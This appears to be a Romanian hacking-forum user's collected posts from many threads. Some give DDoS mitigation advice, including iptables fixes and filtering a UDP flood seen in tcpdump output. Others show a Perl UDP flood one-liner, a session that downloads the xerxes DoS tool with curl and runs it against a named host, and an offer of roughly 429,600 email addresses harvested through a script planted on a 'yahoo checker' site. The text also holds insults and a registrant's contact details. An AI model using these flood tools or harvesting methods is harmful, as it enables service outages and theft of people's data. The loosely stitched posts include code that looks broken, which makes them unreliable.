aelius

@ilbr22: Scriptul prezentat de tine are urmatoarele lipsuri sau chestii gandite prost: - La servicii, este specificat portul 143 ; Acest port este pentru IMAP si nu vad de ce ai avea nevoie sa-l accesezi din extern. Imap-ul il poti folosi pe localhost doar, pentru webmail iar clientii se conecteaza la pop 3 (110); Aici mai este de comentat in privinta celorlalte porturi. - Am observat ca ai folosit default policy DROP insa la acceptarea pachetelor ai "-m state --state NEW". Orice pachet syn este cu STATE NEW si apoi va fi "RELATED", asa cum spune regula de mai sus. Deci, poate inghite pachete syn pana la epuizarea resurselor. Aici ai asa: SERVICII1="25 110 53 123" for i in ${SERVICII1}; do iptables -A INPUT -p udp --dport ${i} -m state --state NEW -j ACCEPT done - port 123 este NTP (network time protocol). Banuiesc ca nu ai server de timp setat pe server, asadar, portul UDP 123 trebuie acceptat ca srcport (Exemplu accept pachetele UDP de la orice sursa cu sursa port 123) "--sport 123" - porturile 25 si 110 (smtp + pop3) nu au nevoie de UDP. - udp este stateless, nu vad de ce ai seta "-m state" (match state) - nu vad nimic acceptat cu sport 53 (serverul nu iti va rezolva niciun host) @Zatarra: O sa raspund tot astazi la post pentru intrebarea ta; O sa-ti dau mai multe solutii

La un tutorial ASM facut de @c0unt3rlog1c despre un udp flooder au fost ceva intrebari puse de @Zatarra; Pentru a nu altera threadul omului, am deschis discutia asta. Sunt sigur ca sunt multi care au astfel de intrebari. Va astept aici cu orice intrebare legata de atacurile (D)DoS, efectele acestora cat si metodele de inlaturare ale efectelor. Din exemplul meu din acel thread: 21:07:38.225850 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225855 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225857 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225867 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225869 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225994 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225996 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225998 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225999 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 Se pot observa urmatoarele caracteristici ale acestui atac (profilul): - Srcaddr este static (172.16.0.4) - Srcport este static (37438) - Dstport este static (80) ; Avand port 80, tinta atacului este serviciul web. - Lungimea pachetului nu este variabila (length 1) - Atacul este de tip UDP / Non spoofed. Nota: Atacurile udp vizeaza congestia conexiunii. Este un atack ce 'consuma' latimea de banda. Deci, chiar daca filtrati atacul (caz in care pachetele nu mai sunt procesate), latimea de banda o sa fie utilizata. O sa luam intrebarile puse in threadul celalalt (le folosim ca scenarii): - Solutia in ambele scenarii, avand in vedere exemplul de atac de mai sus este filtrarea pachetelor UDP ce au ca tinta portul 80. Acesta fiind folosit de HTTP, comunicarea client->server se face doar pe TCP.

@Zatarra: Deschid un nou thread cu discutia, poate sunt mai multi interesati de subiect. Sa nu "alteram" threadul omului. // edit Noul thread cu discutia este aici. Merci,

Daca este exact ca in exemplul de mai sus, se vede ca pleaca constant de la acelasi SRC PORT (sport). La fiecare initializare a scriptului src port este intotdeauna altul. Insa daca cineva porneste comanda de mai sus pe un server catre tine, pana gasesti alta solutie in caz ca nu ai scule specializate de filtering, poti filtra dupa src port. Dar fiind vorba de o singura sursa, de ce nu ai da nullroute pe SRC IP ? Sau iti dau un hint: http://freecode.com/projects/glflow ; Poti modifica asta ca in loc de alerta, sa dea nullroute Mai este o mica problema: Filtrezi atacul, insa banda este epuizata. Daca ai un link de 100Mbps si ala trimite pachete la greu isi atinge scopul indiferent ce ai face (ca end user) //edit: normal ca tot ai trafic, pachetele continua sa vina, fie ca sunt procesate sau nu.

Da, ai inteles bine, insa uite un exemplu: Am in reteaua de acasa un mic server pe care lucrez si are adresa ip 172.16.0.4. Masina de lucru este defapt un mac si are adresa ip 172.16.0.3. Am facut acum doua minute un test care arata cam asa: Pe server: hp ~ # perl -e 'use Socket; socket(tex, PF_INET, SOCK_DGRAM, 17); for ( { send(tex, 0, 0, sockaddr_in(80, inet_aton("172.16.0.3"))); }' Uite ce s-a intamplat pe Mac: tex ~ $ tcpdump -n dst port 80 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on en0, link-type EN10MB (Ethernet), capture size 65535 bytes 21:07:38.225850 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225855 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225857 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225867 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225869 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225994 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225996 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225998 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.225999 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.226001 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.226002 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.226004 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.226022 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 21:07:38.226024 IP 172.16.0.4.37438 > 172.16.0.3.80: UDP, length 1 ............ Am repetat testul folosind AF_INET in loc de PF_INET, "adicatelea", cam asa: hp ~ # perl -e 'use Socket; socket(tex, AF_INET, SOCK_DGRAM, 17); for ( { send(tex, 0, 0, sockaddr_in(80, inet_aton("172.16.0.3"))); }' In ambele cazuri, indiferent de AF_INET sau PF_INET, rezultatul a fost acelasi si asta m-a dus la concluzia ca PF_INET si AF_INET este unul si acelasi lucru, in ciuda faptului ca in sfantul manual scrie asa: AF = Address Family PF = Protocol Family In situatia de fata, eu defineam protocolul, deci in mod normal ar trebui sa folosesc PF_INET, nu? M-am uitat si la headerul 'socket.h' din sursa kernelului (include/linux/socket.h ) /* Protocol families, same as address families. */ #define PF_INET AF_INET Deci, nu mai este nicio diferenta intre ele ?

O mica intrebare te rog: invoke socket, AF_INET, SOCK_DGRAM, 17 ;IPPROTO_UDP = 17 As putea pune in loc de linia de mai sus linia asta? invoke socket, PF_INET, SOCK_DGRAM, 17 ;IPPROTO_UDP = 17 Mai exact, sa inlocuiesc AF_INET cu PF_INET. Ma interesaza raspunsul, daca ar functiona sau nu, cat si motivul. Multumesc

Ma bucur. Eu sunt Marian si imi place sa vorbesc cu oameni. Inca nu m-am prins daca "c0unt3rlog1c" asta e nume de familie sau prenume. Oricum .. Bun venit

"Bine ai venit (aici te poti prezenta)" - Aia zice sectiunea asta. Daca ai spus doar salut, de ce ai mai facut efortul de a deschide threadul ?

Fereasca sfantul ...

Shit happens Te-a cautat lumea pe site-uri de "yahoo online shits" PS: E si al meu chiar, doar ca nu folosesc niciodata alte email-uri decat cele de pe domeniile mele )

Eu n-am ce face cu ele, deasta le pun aici, poate le trebuie baietilor. Merci

Am pus la un sclav intr-un site de 'yahoo checker' un script cu "fwrite"; Le-am dat un sort sa fie unice insa este probabil sa fie si ceva mizerii prin ele. (email-uri inexistente) # wc -l log2.txt 429600 log2.txt Poftiti lupii mei, download aici.

"We have our own IP-networks (PI/PA), autonomous systems (AS) and network equipment." You have my penis in your little hands. This is HOSTNOC Network and you are some kind of reseller. Also, you forgot to install the fucking intermediate SSL from Rapid SSL. grandhost.cc has address 64.191.87.197 NetRange: 64.191.0.0 - 64.191.127.255 CIDR: 64.191.0.0/17 OriginAS: NetName: HOSTNOC-3BLK OrgTechHandle: SMA4-ARIN OrgTechName: Arcus, S. Matthew OrgTechPhone: +1-570-343-2200 OrgTechEmail: nic@hostnoc.net Banned.

Intre idsplus si docs rtfm us este 1Gbps (link-urile de la servere sunt direct conectate in router / wire speed). Deci nu e switching, nu sunt loss-uri, nimic. Si totusi, trimite niste pachete ametite vai de ele. E batjocura. Poate daca-l rulezi de pe 100 de servere face si el ceva. Daca trimit SYN spoofed la banda aia, fuge in padure serverul idsplus ~ # su - tex tex@idsplus:~$ curl -o xerex.c http://www.airdemon.net/xerxes.txt % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 2299 100 2299 0 0 8256 0 --:--:-- --:--:-- --:--:-- 52250 tex@idsplus:~$ tex@idsplus:~$ cc xerex.c -o xerex tex@idsplus:~$ ./xerex docs.rtfm.us 80 ........ // output removed [21: Voly Sent] [21: Voly Sent] [21: Voly Sent] [21: Voly Sent] [46: Voly Sent] [46: Voly Sent] [46: Voly Sent] [46: Voly Sent] [46: Voly Sent] [46: Voly Sent] [46: Voly Sent] ........ // output removed

Ba, da nu vezi link acolo ? Nu mai redeschide 20 de threaduri doar ca sa arati ca esti terminat.

Sa inteleg ca te-ai inregistrat la noi pentru a pune un link cu referal? Altfel nu vad de ce ti-ai fi ales chiar 'amazon' ca nickname. Scenariu: Ai cautat pe google daca mai prezinta cineva treaba, ai gasit RST, ti-ai facut repede un account la plezneala, si hop cu link-ul cu ref. PS: Sa nu spui ca din graba ai facut doua greseli in postul asta ? "Uitate" este 'uita-te' - probabil nu inveti prea multa gramatica ascultand manele Deci, ce e mai jalnic, threadul omului care are 1 an la noi pe forum sau al unui mucea care intra sa faca spam in speranta ca-l va cuprinde fericirea cu cei 2-3 euro castigati pe luna din link-uri afiliate ? Ban permanent, link sters si thread inchis.

Mai era unul la comments pe filelist de intreba la un pr0n daca are subtitrare ) Nu stiu daca le am sau nu, sunt plecat cu laptopul dupa mine ... duminica ajung acasa si le caut

@fallen_angel: Index of /IT/Ethical Hacking/CEH v7 Instructor Slides/

e pubela. Ai priceput sau iti desenam ?

Pe server se genereaza CSR si KEY-ul; Certificatul propriu zis este CRT-ul si este emis de o autoritate. Deci acel "Third Party" este defapt inclus in radacina browserelor. ps: explicatie ca in cazul in care apare vreun gigel care crede ca certificatele self signed sunt valide si recunoscute de browsere.

Mai are cineva nevoie de hellas ? Am niste greturi de dimineata ....

Mai pluseaza - poate din cauza bonusurilor mici nu se baga nimeni. FastWeb si Infostrada sunt foarte mari.

Ce ati fumat bre ? Ca suna bine )

sunt inca activ si acum si pururea si vecii vecilor, amin!

M-am gandit la chestia prezentata de mine pentru a nu implica banii in joc. Sunt de acord ca sunt cativa care au cunostinte destul de solide (nu doar in IT), insa cred ca sunt reticienti cand este vorba sa dea bani. Totusi, ar suna interesant sa se stranga cate 20 de persoane cu taxa de inscriere de 10 euro si la sfarsitul lunii castigatorul sa ia 200 de euro (tot ce s-a strans). Avem multi studenti pe aici si cred ca ar fi interesati de banutii aia. Ideea este sa aducem pe forum continut de calitate iar utilizatorii ce ne sprijina sa primeasca o mica atentie. Cred ca ati vazut ca in ultima luna, cel putin 5-6 au cerut "imprumuturi" de cativa centi prin paypal pentru a cumpara un domeniu.